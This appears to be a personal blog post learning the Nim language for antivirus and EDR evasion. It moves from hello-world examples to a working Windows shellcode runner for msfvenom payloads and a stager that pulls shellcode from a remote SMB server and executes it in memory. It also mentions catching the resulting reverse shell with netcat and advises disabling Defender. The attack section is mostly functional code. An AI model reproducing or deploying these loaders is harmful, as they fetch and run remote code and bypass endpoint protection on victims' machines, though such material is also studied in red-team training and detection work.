# Overview
I keep seeing AV / EDR evasion tools being developed in Nim and thought I should look into the language. Going to break this down into a few steps.
1. Hello world program (obvs)
2. Hello world program with a function
3. Hello world program calling a native command
4. Generics (Java objects back to haunt me)
5. Shellcode runner (Small jump ik)
6. Stager which get file from the *cloud* (ooo buzz words.)

# Installing Nim
1. Google Nim
2. Click the link from the Nim website
3. Download and install Nim
4. Spend 1 hr trying to figure out why it wont compile.
5. Go back to website and read the page
6. Install gcc
7. Now compile a simple program (in cmd `nim c <filename>`)
8. TaDa Nim developer

# Hello World x3
## Part 1
Super easy its legit just
```c
echo "Hello World!"
```

compile with
```bash
nim c hello.nim
```

## Part 2
So coming from a python background the syntax is close enough that I can guess what it does. The weird thing is that `=` sign at the end.
```c
proc <name>(): <output_type> =
```

Besides the syntax still easy:
```c
proc hello(): string =
    return "Hello World!"

echo hello()
```

## Part 3
As the end result is to get windows api calls probs best to try to figure out how to call system commands.

So the "hello world" of powershell commands: `gci`

You can call shell commands by importing `osproc`

```c
import osproc

proc command(): string = 
    var output: string
    output = exec_cmd_ex("powershell.exe gci").output
    return output

echo command()
```

I really like how you can just call `.ouput` and it will save both the ouput and the format into a string var. (The powershell font gets messed up but meh)


# Generics
Why cant this just be done behind the scenes like in python. :(

tbf its not that bad. So most shellcode payloads are byte arrays so you need a size and type. In Nim generics you can do this by passing `[I,T]` as parameters. The syntax gets weird.
```c
proc <command_name>[I,T](<var_name: var array[I,T]): <output_type> =
```

So to pass an array it would be:
```c
import osproc

proc command[I,T](payload: var array[I,T]): string =
    return payload

var num = ["1","2"]
echo command(num)

```

# Shellcode runner
The easiest way to just run shell code is to do virtualalloc, memcopy and then run the memory block. That's exactly what we are going to do. There is a module that let's us call win api functions. You can install it with nimble (just like pip3 but for nim)
```
import winim/lean
```

Generate some shellcode with msfvenom and output it as csharp.
```c
import winim/lean

proc main(): void = 
    var shellcode: array[<sizeofshellcode>,byte] = [
        byte <shellcode> ]

    var buffer = VirtualAlloc(nil, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    copyMem(buffer, shellcode[0].addr, sizeof shellcode)

    cast[proc(){.nimcall.}](buffer)()

main()

```

Let's go over the code.

Line 3: is just declaring the array just like before but instead of using generics the values are hard coded.

Line 5: Calling virtalalloc just like you would in c, using nil for the LPVOID null value.

Line 6: This is the exact same as memcopy. The second argument needs to be a pointer to the shellcode. So this is done by grabbing the first item (the start of the byte array) and calling addr on it. This will give the memory location of the shellcode.

Line 7: It just casts the shellcode to the write data type and runs it with the `()`

Make sure to disable defender when compiling and running the code.
# Stager
This is going to be the exact same as the shellcode runner but instead of having the shellcode in the file it is going to read it as a file from a remote smb server. I'm going to set up an impacket smbserver and a nc shell in aws cause I have an aws linux box and need to use it for something.

## Nim code bit
The nim code section is two bits

The first being downloading the file:
```c
var filename = "\\\\<ip>\\smb\\code.bin"
var file: File = open(filename, fmRead)
var fileSize = file.getFileSize()

var shellcode = newSeq[byte](fileSize)
discard file.readBytes(shellcode,0,fileSize)
```

So the shellcode is saved in the shellcode variable, which is a sequence of bytes. This is very similar to an array but has a `@` symbol at the start. (idk why.)

Now just add the exact same win api code. Giving the final source code of:
```c
import winim/lean

var filename = "\\\\<ip>\\smb\\code.bin"
var file: File = open(filename, fmRead)
var fileSize = file.getFileSize()

var shellcode = newSeq[byte](fileSize)
discard file.readBytes(shellcode,0,fileSize)
   
var buffer = VirtualAlloc(nil,fileSize,MEM_COMMIT, PAGE_EXECUTE_READWRITE)
copyMem(buffer,shellcode[0].addr,fileSize)

cast[proc(){.nimcall.}](buffer)()
```

## Architecture (as in a two processes)
Impacket smb server to host the payload and a nc shell to catch it.

(idk why I made this a title)


# More Nim?
Maybe it's a lot easier then C / C++ but tbh I'll probs just do everything twice and learn both languages.

Next project will either be a working MAC addr encoder (atm I'm stuck with the shell not calling back) or some sort of xor encryptor to get use to decoding in memory.